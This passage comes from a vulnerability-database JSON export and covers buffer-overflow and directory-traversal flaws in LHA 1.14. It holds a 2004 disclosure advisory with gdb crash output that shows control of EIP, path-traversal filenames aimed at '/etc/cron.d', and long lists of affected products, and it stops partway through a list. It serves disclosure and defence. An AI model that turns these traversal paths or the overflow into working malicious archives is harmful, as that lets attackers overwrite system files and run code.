        "id": "JVNDB-2004-000169"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ],
    "trust": 0.6
  }
}

var-200408-0141
Vulnerability from variot

Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path"). The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------

LHa buffer overflows and directory traversal problems

PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)

  • DESCRIPTION *

LHa is a console-based program for packing and unpacking LHarc archives.

It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.

  • OVERVIEW *

LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case.

  • TECHNICAL DETAILS *

a) two stack-based buffer overflows

The buffer overflows in LHa occur when testing (t) or extracting (x) archives where the archive contents have too long filenames or directory names. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.

By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:

$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt

0 0x55555555 in ?? ()

Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt

0 0x55555555 in ?? ()

Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $

b) two directory traversal problems

LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".

  • ATTACHED FILES *

I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.

  • TIMELINE *

18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory

// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200408-0141",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tsugio okamoto",
        "version": "1.17"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tsugio okamoto",
        "version": "1.15"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "tsugio okamoto",
        "version": "1.14"
      },
      {
        "model": "winzip",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "winzip",
        "version": "9.0"
      },
      {
        "model": "cgpmcafee",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "stalker",
        "version": "3.2"
      },
      {
        "model": "propack",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "sgi",
        "version": "3.0"
      },
      {
        "model": "propack",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "sgi",
        "version": "2.4"
      },
      {
        "model": "winrar",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "rarlab",
        "version": "3.20"
      },
      {
        "model": "internet gatekeeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.32"
      },
      {
        "model": "internet gatekeeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.31"
      },
      {
        "model": "f-secure for firewalls",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "f secure",
        "version": "6.20"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.13"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.11"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.10"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.8"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.7"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.6"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.5"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.4"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3.3"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.3"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.2"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.1"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "clearswift",
        "version": "4.0"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.52"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.60"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "lha",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "1.14i-9"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.5"
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "core_1.0"
      },
      {
        "model": "mailsweeper",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "clearswift",
        "version": "4.3.6_sp1"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.5"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "f-secure anti-virus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "6.21"
      },
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.6"
      },
      {
        "model": "f-secure internet security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "f-secure internet security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "f-secure personal express",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f secure",
        "version": "4.7"
      },
      {
        "model": "lha for unix",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "lha for unix",
        "version": "1.17"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "9"
      },
      {
        "model": "linux advanced workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1"
      },
      {
        "model": "linux i686",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "lha-1.14i-9.i386.rpm",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "hat fedora core1",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.17"
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.15"
      },
      {
        "model": "s.k. lha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mr",
        "version": "1.14"
      },
      {
        "model": "webshield smtp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5"
      },
      {
        "model": "webshield appliances",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan professional",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan for netapp",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan enterprise i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.0"
      },
      {
        "model": "virusscan command line",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.1"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "6.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5.1"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.5"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.0.3"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "3.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.0"
      },
      {
        "model": "virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "1.0"
      },
      {
        "model": "virex",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "securityshield for microsoft isa server",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "portalshield for microsoft sharepoint",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "netshield for netware",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "managed virusscan",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "linuxshield",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "internet security suite",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for mail servers with epo",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for lotus domino",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "groupshield for exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.5"
      },
      {
        "model": "asap virusscan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "0"
      },
      {
        "model": "active virus defense smb edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "active threat protection",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "active mail protection",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.7"
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.6"
      },
      {
        "model": "personal express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.5"
      },
      {
        "model": "internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "anti-virus for workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for windows servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for windows servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for samba servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.60"
      },
      {
        "model": "anti-virus for ms exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "6.21"
      },
      {
        "model": "anti-virus for mimesweeper",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.42"
      },
      {
        "model": "anti-virus for mimesweeper",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.41"
      },
      {
        "model": "anti-virus for linux workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux workstations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus for linux servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus for linux gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.52"
      },
      {
        "model": "anti-virus for linux gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "4.51"
      },
      {
        "model": "anti-virus client security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.52"
      },
      {
        "model": "anti-virus client security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "5.50"
      },
      {
        "model": "anti-virus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2004"
      },
      {
        "model": "anti-virus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "2003"
      },
      {
        "model": "mailsweeper sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "clearswift",
        "version": "4.3.6"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.022"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
